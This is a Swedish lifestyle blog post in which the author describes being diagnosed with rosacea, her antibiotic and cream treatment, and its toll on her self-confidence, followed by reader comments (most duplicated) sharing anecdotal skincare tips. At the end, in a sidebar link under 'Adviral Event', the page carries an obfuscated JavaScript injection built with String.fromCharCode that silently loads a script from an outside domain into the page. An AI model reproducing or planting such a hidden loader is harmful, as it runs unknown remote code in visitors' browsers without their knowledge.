En naken sanning, jag har fått en hudsjukdom! Jag valde att svara på dessa frågor i en artikel, men vill nu skriva ett par rader om det, direkt ifrån hjärtat…

10449536_749937818378048_6069076134939881504_n

 

God kväll på er!

På den högra bilden så ser ni också att jag är svullen i HELA ansiktet, på den vänstra bilden så har jag gått på behandling i drygt en vecka… jag svarar bra på medicinen =) Mer om det längre ner…

Det är lite blandade känslor gällande Veckans Hänt Extra! För er som inte vet det så är det så att i vissa fall så ringer journalisterna inte ens upp en när det gäller vissa rubriker eller löp osv. Ibland grundar det sig helt och hållet på ”skvaller” ibland kan kommentarer, bilder,  m.m plockas ifrån bloggen, instagram eller tom. facebook.

Ibland så kan journalisten ringa upp och då ge en chans så att man får möjligheten att kommentera, men också fint påpeka att -det kommer att gå i tryck oavsett om du väljer att kommentera eller inte. Då dom isåfall bara skriver att man har valt att inte kommentera.

Detta är en helt ny värld för mig, och jag har nu cirkulerat i media sedan förra våren. Det finns massa oskrivna regler för vad man borde göra och inte. Men jag har haft tur, dom flesta journalister är helt okay, vissa är till och med riktigt bra 😉 Några rötägg har man stött på, någon har jag bett fara åt helveta! Men som sagt dom flesta är jätte  bra att ha och göra med. men det är min åsikt, det varierar säkerligen från person till person.

Denna artikeln valde jag att ställa upp på. Med lite skräckblandad förtjusning. Förtjusning över att om just DU har hudproblem som du inte fått en fastställd diagnos på. Så för gudskull stå på dig och se till att du får den hjälp som du behöver få! Ingen förtjänar att gå omkring och känna sig som ett monster. Det finns hjälp att få, det gäller bara att hitta rätt form utav hjälp.

Skräck övar dom extremt hemska bilderna!  FY FAN som jag ser ut! Jag får ont i magen av att bara titta på dom!  Inombords kan jag känna en osäkerhet, vad ska just DU  och alla andra tycka om dessa bilderna???

Jag är inte en person som tycker om att ha mycket smink. Jag går mer än gärna ut osminkad. Jag brukar färga bryn och fransar för att piffa mig lite. Men till vardags är det sällan jag ens använder mascara. Ett par gånger om året, max!

Ska jag däremot gå ut en kväll, eller gå på en middag, då tycker jag det är jätte roligt att sminka mig och få göra mig lite extra fin. Men då är det oftast en bas, lite lätt skimmer på ögonlocken, mascara, läppgland och 12 min senare så är jag klar 😉 Inte någon kraftansträngning direkt 😉 Oj, jag höll på att glömma… lite rouge också! Hehe!

MEN när jag i perioder (flera gånger om året) Får mina ”hudproblem” så är det ibland så illa att jag inte ens velat gå utanför dörren! Dessutom så jobbar jag inom service yrket där jag möter människor från morgon till kväll, och verkligen inte kan gömma mitt ansikte.   jag har spenderat 10-tusentals kronor på dyra krämer, olika behandlingar, lagt om kosten osv osv… utan resultat. Vissa saker har det blivit tillfälligt bättre utav men ingenting har fungerat i längden =(

 

10299928_749937761711387_3020012881806673957_n

 

Som sagt, jag kan gå ut helt osminkad och känna mig tillfreds med det. Men att gå ut med ett ansikte fullt med sår och stora rodnader, det är inte roligt als! Det känns som att alla stirrar på en och man känner sig så otroligt liten och helt utan självförtroende! jag kunde ibland känna mig rent av äcklig! Detta gjorde att jag höll på att tacka nej till min medverkan i Ensam Mamma Söker. Tanken slog mig, tänk om det ”blommar ut” under inspelningen, vad gör jag då??? Det skulle ju ändå vara en kamera med mig dygnet runt i flera månader! Hmm… men det hindrade mig inte som ni vet =) Men vad är det som händer????  Jo…

Saken är den att jag får röda rodnader, blir lite lätt svullen ut, får stora sår som vätskar sig, inte med var som i finnar eller acne. Utan mer som en genomskinlig vätska. Det svider och gör skit ont!

Jag har haft detta problemet i över 9år! Utan att veta vad det är! Jag har gått till vårdcentralen, bett om en remiss till hudspecialisten. Men inte fått rätt hjälp. I vissa fall så har dom mer eller mindre nonchalerat mig och skyllt det på stress osv. Nu vill jag tillägga att jag har under åren flyttat runt en hel del, så det behöver nödvändigtvis inte bara vara den lokala vårdcentral där jag bor just nu. Nu efter många år utav återkommande hudproblem som har resulterat i återkommande ångest och väldigt dåligt självförtroende.

Men nu äntligen så har jag fått en diagnos! Jag har helt enkelt Rosacea! SUCK!

Tänk att det skulle ta så många år att komma på! Men det är bättre sent än aldrig. Jag har nu fått det diagnoserat och kan förhoppningsvis göra någonting åt det. Jag har nu fått en stark antibiotika medicin som jag ska äta i 4 månader. Dvs Juni, juli, augusti och september. jag får under några som helst omständigheter inte vara i solen eller sola. Alltså en HEL SOMMAR UTAN att sola! Jo tack! jag som är van att vara brun som en pepparkaka kommer alltså inte att få njuta utav sommarens sköna strålar!  Men lika glad är jag för det, för om detta gör att jag blir av med det, då kommer jag att vara min nya hudläkare, evigt tacksam! <3 #hoppas hoppas hoppas!

Jag kombinerar antibiotikan med en receptlagt antibiotika kräm, och en hel serie med krämer ifrån NeoStrata som är helt och hållet anpassade efter mina bekymmer. Så bye bye alla dyra ansiktskrämer som jag tidigare haft….  Nu hoppas jag verkligen att jag kommer att få rätsida på detta.

Tycker du att det låter ytligt? För mig så sitter jätte mycket utav mitt självförtroende i min hy. Är jag utan bekymmer och fin i hyn då känner jag mig jätte fin. Har jag min hudsjukdom i ”blomning” så känner jag mig fruktansvärd och gömmer mig gärna under en filt i soffan istället! Känner du igen dig? Vad är dina erfarenheter om hudbekymmer? Skriv gärna och berätta!

Jag har nu hållt på med medicineringen under en period och svarar väldigt bra på den. =)

Jag hoppas innerligt att det ska hålla i sig och att jag efter många år kan bli kvitt det värsta utav det. Även om man inte kan bli av med Rosacea!

 

_MG_0906

Foto Linda Himsel

 

_MG_0906

 

Ja, då vet ni det…. Självförtroendet är inte alltid på topp! Men du, du vet att du duger precis som du är! Glöm aldrig det! Massa kramar / My Martens

 

 

 

42 Komentarer

 1. Ditt problem känner jag väldig väl igen. När jag fick Rosacea för många år sen visste ingen heller vad det var. Tack och lov hittade jag förra året äntligen min räddning genom att jag läste om Exuviance som verkligen har löst mitt problem. Jag kollade med hudterapeut i Kalmar och köpte ett litet kit och sen dess har jag faktiskt slängd alla mina andra hudvårdsgrejer. Jag förstå dig. Ingenting är värre än att går runt och inte känner för sig själv! Kram

  • Åhhh! Vad skönt att du har hittat produkter som hjälper dig =) Det är verkligen frustrerande när ingenting fungerar som man gör!
   Trevlig midsommar på dig =) Kram

 2. I ett år fick jag massa utslag runt munnen först och sen slutade det med att det var format precis som killarnas skägg sitter, och det kändes som ett rivjärn! Det var riktigt obehagligt och såg för jävligt ut!! Åt ett par olika mediciner innan det försvann och kom aldrig tillbaka, men jag vet fortfarande inte vad det var för något…
  Hoppas verkligen du blir av med ditt med!!!
  Kram http://www.lotte4.blogspot.com

 3. Ditt problem känner jag väldig väl igen. När jag fick Rosacea för många år sen visste ingen heller vad det var. Tack och lov hittade jag förra året äntligen min räddning genom att jag läste om Exuviance som verkligen har löst mitt problem. Jag kollade med hudterapeut i Kalmar och köpte ett litet kit och sen dess har jag faktiskt slängd alla mina andra hudvårdsgrejer. Jag förstå dig. Ingenting är värre än att går runt och inte känner för sig själv! Kram

  • Åhhh! Vad skönt att du har hittat produkter som hjälper dig =) Det är verkligen frustrerande när ingenting fungerar som man gör!
   Trevlig midsommar på dig =) Kram

 4. I ett år fick jag massa utslag runt munnen först och sen slutade det med att det var format precis som killarnas skägg sitter, och det kändes som ett rivjärn! Det var riktigt obehagligt och såg för jävligt ut!! Åt ett par olika mediciner innan det försvann och kom aldrig tillbaka, men jag vet fortfarande inte vad det var för något…
  Hoppas verkligen du blir av med ditt med!!!
  Kram http://www.lotte4.blogspot.com

 5. Hei,
  når jeg såg bildet ditt og hva du skrev tenkte jeg direkt rosacea – så bra att du endelig fått diagnosen! Jeg hadde tur og fikk diagnosen raskt og fikk god behandling, så jeg har nesten ikke hatt noen problem de siste årene.
  Det er synd at vanlige leger ikke kan så mye om denne type rosacea. Ansiktet er jo fullt av kviser, rødt og hovent. For meg var det også vanskelig å vise meg ute og sminke hjalp ikke noe.

  • Det låter fantastiskt att du nästan inte lidit av det als sista åren =) Hoppas att det håller i sig! jag själv håller tummar & tår för att jag ska få bukt med mitt nu också! Kramar

 6. Inte ytligt alls ! Och jag förstår precis hur du känner. En morgon i höstas vaknade jag nämligen upp en morgon med hela kroppen full av utslag. Det var hundratals som kom bara över en natt och det visade sig att det var sonens halsinfektion som hade smittat mig och i sin tur utlöst psoriasis över hela kroppen. Där och få ville jag typ bara stänga in mig, jag såg verkligen inte klok ut ! Nu har jag förstått att även mina utslag kommer och går lite i perioder och såhär på sommaren har jag en ”bra” period, men fan ska veta att jag har riktigt dåliga dagar oxå. Och då är det inte kul att leva i min prickiga kropp ! Kram på dig!

  • Men jösses! Det låter inte als kul! Jag tror att vi båda förstår varandra ganska väl… Det låter klychigt, MEN ”skönhet kommer från insidan” ! Haha! Men när man sitter där och har som mest utslag/rodnader så hjälper inte dom kommentarerna als, då man upplever det som fruktansvärt jobbigt, irriterande och frustrerande! Hoppas att det löser sig för dig! Kram

 7. Hei,
  når jeg såg bildet ditt og hva du skrev tenkte jeg direkt rosacea – så bra att du endelig fått diagnosen! Jeg hadde tur og fikk diagnosen raskt og fikk god behandling, så jeg har nesten ikke hatt noen problem de siste årene.
  Det er synd at vanlige leger ikke kan så mye om denne type rosacea. Ansiktet er jo fullt av kviser, rødt og hovent. For meg var det også vanskelig å vise meg ute og sminke hjalp ikke noe.

  • Det låter fantastiskt att du nästan inte lidit av det als sista åren =) Hoppas att det håller i sig! jag själv håller tummar & tår för att jag ska få bukt med mitt nu också! Kramar

 8. Inte ytligt alls ! Och jag förstår precis hur du känner. En morgon i höstas vaknade jag nämligen upp en morgon med hela kroppen full av utslag. Det var hundratals som kom bara över en natt och det visade sig att det var sonens halsinfektion som hade smittat mig och i sin tur utlöst psoriasis över hela kroppen. Där och få ville jag typ bara stänga in mig, jag såg verkligen inte klok ut ! Nu har jag förstått att även mina utslag kommer och går lite i perioder och såhär på sommaren har jag en ”bra” period, men fan ska veta att jag har riktigt dåliga dagar oxå. Och då är det inte kul att leva i min prickiga kropp ! Kram på dig!

  • Men jösses! Det låter inte als kul! Jag tror att vi båda förstår varandra ganska väl… Det låter klychigt, MEN ”skönhet kommer från insidan” ! Haha! Men när man sitter där och har som mest utslag/rodnader så hjälper inte dom kommentarerna als, då man upplever det som fruktansvärt jobbigt, irriterande och frustrerande! Hoppas att det löser sig för dig! Kram

 9. Har precis fått diagnosen Rosacea & vet inte längre vad jag ska ha för smink eller hudvårdsprodukter för att det ska bli bättre…Har receptbelagd kräm mot det som inte verka hjälpa & inte få man vara ute i solen ? Hoppas vi alla med detta problem snart blir hjälpta!!! Tydligen har man denna hudsjukdom livet ut när man väl fått den :-(((

  • Åhhhh! Det låter inte kul! Samma här. Precis iagnoerad så jag har inte heller hittat just ”min väg” i hudvårds djungeln! Men jag använder just nu Neostrata. Jag har bara använt det i ett par veckor, men tycker att det fungerar ganska bra. Dock så känner jag mig torrare utav det, så jag förösker att lägga en fuktmask i veckan plus att jag köpte till ett återfuktande serum ifrån just Neostrata. Men många andra tipsar mig även om hudvårdsprodukter ifrån Exuviance. Jag har provat dom för längesen… kanske kan dom fungera på dig?
   Solandet…. ja, jag själv är en soldyrkare. men för att känna mig lite frächare så börjar jag att sol-duscha mig varje vecka från nästa vecka! Det är bättre att man håller sig undan solen nu när man medicineras än att man får massa fula pigmentförändringar som ett brev på posten! Stort Lycka till! Kram

 10. Jag vill tipsa om Cliniques produkter. Redness Solution heter en av deras serier som har hjälpt mig. Jag solar aldrig ansiktet, det blir värre då, jag använder Cliniques CC-kräm som innehåller solskyddsfaktor varje dag.
  Undvik också stark mat och tyvärr blir det också värre av alkohol.
  Hoppas du blir bättre.
  Marie

 11. Hejsan!! Vill bara tipsa om DAHL produkter för just rosacea, har provat massa olika men inget som har hjälpt förrens nu när jag köpte dahl produkter köpte startpaketet för lätt rosacea och äntligen kan jag gå utan smink

 12. Har precis fått diagnosen Rosacea & vet inte längre vad jag ska ha för smink eller hudvårdsprodukter för att det ska bli bättre…Har receptbelagd kräm mot det som inte verka hjälpa & inte få man vara ute i solen 🙁 Hoppas vi alla med detta problem snart blir hjälpta!!! Tydligen har man denna hudsjukdom livet ut när man väl fått den :-(((

  • Åhhhh! Det låter inte kul! Samma här. Precis iagnoerad så jag har inte heller hittat just ”min väg” i hudvårds djungeln! Men jag använder just nu Neostrata. Jag har bara använt det i ett par veckor, men tycker att det fungerar ganska bra. Dock så känner jag mig torrare utav det, så jag förösker att lägga en fuktmask i veckan plus att jag köpte till ett återfuktande serum ifrån just Neostrata. Men många andra tipsar mig även om hudvårdsprodukter ifrån Exuviance. Jag har provat dom för längesen… kanske kan dom fungera på dig?
   Solandet…. ja, jag själv är en soldyrkare. men för att känna mig lite frächare så börjar jag att sol-duscha mig varje vecka från nästa vecka! Det är bättre att man håller sig undan solen nu när man medicineras än att man får massa fula pigmentförändringar som ett brev på posten! Stort Lycka till! Kram

 13. Jag vill tipsa om Cliniques produkter. Redness Solution heter en av deras serier som har hjälpt mig. Jag solar aldrig ansiktet, det blir värre då, jag använder Cliniques CC-kräm som innehåller solskyddsfaktor varje dag.
  Undvik också stark mat och tyvärr blir det också värre av alkohol.
  Hoppas du blir bättre.
  Marie

 14. Hejsan!! Vill bara tipsa om DAHL produkter för just rosacea, har provat massa olika men inget som har hjälpt förrens nu när jag köpte dahl produkter köpte startpaketet för lätt rosacea och äntligen kan jag gå utan smink

 15. Hej på dig! Vet precis hur det känns… Jag ställde min egen diagnos att jag hade Rosacea strax innan jag fyllde 30. Trodde det var acne först (huden blir ju dock ännu sämre när man kör m acnemedel), trodde det bara var äldre som fick Rosacea. Men jag hade fel. Svarade jättebra på krämen som jag till slut fick ut recept på (kommer inte ihåg namnet) men det tog 6-12 mån tills huden återhämtat sig. Nu ser jag till att skydda ansiktet i solen m minst solskydd 30 (anv Vichys solkräm för ansiktet m mattande effekt) plus ev keps/hatt. Började se en rodnad igen i våras (kan ju komma tillbaka igen) men då köpte jag en receptfri kräm som heter Dermalex som funkar finfint! Lycka till! O du, det är bättre att ta tag i det nu direkt då har man inte lika mkt ytliga blodkärl, huden byggs på lättare/snabbare! Kram C

 16. Hej på dig! Vet precis hur det känns… Jag ställde min egen diagnos att jag hade Rosacea strax innan jag fyllde 30. Trodde det var acne först (huden blir ju dock ännu sämre när man kör m acnemedel), trodde det bara var äldre som fick Rosacea. Men jag hade fel. Svarade jättebra på krämen som jag till slut fick ut recept på (kommer inte ihåg namnet) men det tog 6-12 mån tills huden återhämtat sig. Nu ser jag till att skydda ansiktet i solen m minst solskydd 30 (anv Vichys solkräm för ansiktet m mattande effekt) plus ev keps/hatt. Började se en rodnad igen i våras (kan ju komma tillbaka igen) men då köpte jag en receptfri kräm som heter Dermalex som funkar finfint! Lycka till! O du, det är bättre att ta tag i det nu direkt då har man inte lika mkt ytliga blodkärl, huden byggs på lättare/snabbare! Kram C

 17. Hej!
  Jag har haft rosacea i flera år och måste fortfarande äta antibiotika några gånger per år tyvärr. Så som det verkar nu säger dom att det är liten chans att jag slipper utbrott under en längre tid. Men vi är alla olika och jag hoppas att du slipper så täta återfall som jag, när du ätit klart din medicin.
  Men nåt dom verkligen hjälpt mig är arganolja. Det har gjort min hy bättre än på länge!
  Plus att det är naturligt och inga konstigheter i den.
  Men det är ju mycket trial and error med rosacea tyvärr, då vi alla är olika.
  Jag har även märkt att mineral smink lugnar min rosacea. Så jag kan tom ibland ta på det när jag är hemma om hyn är riktigt irriterad.
  Lycka till med behandlingen!
  Mvh
  Malin

 18. Hej!
  Jag har haft rosacea i flera år och måste fortfarande äta antibiotika några gånger per år tyvärr. Så som det verkar nu säger dom att det är liten chans att jag slipper utbrott under en längre tid. Men vi är alla olika och jag hoppas att du slipper så täta återfall som jag, när du ätit klart din medicin.
  Men nåt dom verkligen hjälpt mig är arganolja. Det har gjort min hy bättre än på länge!
  Plus att det är naturligt och inga konstigheter i den.
  Men det är ju mycket trial and error med rosacea tyvärr, då vi alla är olika.
  Jag har även märkt att mineral smink lugnar min rosacea. Så jag kan tom ibland ta på det när jag är hemma om hyn är riktigt irriterad.
  Lycka till med behandlingen!
  Mvh
  Malin

 19. Hej, hoppas behandlingen hjälper! Du får inte vistas i solen men hur är det med alkohol och den antibiotika du äter? Så effekten inte minskar!

 20. Hej, hoppas behandlingen hjälper! Du får inte vistas i solen men hur är det med alkohol och den antibiotika du äter? Så effekten inte minskar!

 21. Du är så himla stark som berättar detta för oss. Du är underbar som person jag älskar verkligen dig och Ludvig och ni är som min lilla familj även om vi inte känner varandra. Jag kommer alltid att vara där för dig och Ludvig kram till dig och älskade Ludvig

 22. Du är så himla stark som berättar detta för oss. Du är underbar som person jag älskar verkligen dig och Ludvig och ni är som min lilla familj även om vi inte känner varandra. Jag kommer alltid att vara där för dig och Ludvig kram till dig och älskade Ludvig

 23. Jag är helt botad från min svåra rosacea. Har inte haft utslag eller rodnad på fem år nu. Jag använder dahl skincare och går på behandling på acnespecialisten två gr om året. Deras mirakelsalva activator 5%är helt magisk. Jag körde en kur och en till året därpå när nya symptom dök upp och nu är jag helt besvärsfri. Tar även deras ipl behandling en till två gånger om året! Sååå lycklig!

 24. Jag är helt botad från min svåra rosacea. Har inte haft utslag eller rodnad på fem år nu. Jag använder dahl skincare och går på behandling på acnespecialisten två gr om året. Deras mirakelsalva activator 5%är helt magisk. Jag körde en kur och en till året därpå när nya symptom dök upp och nu är jag helt besvärsfri. Tar även deras ipl behandling en till två gånger om året! Sååå lycklig!

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/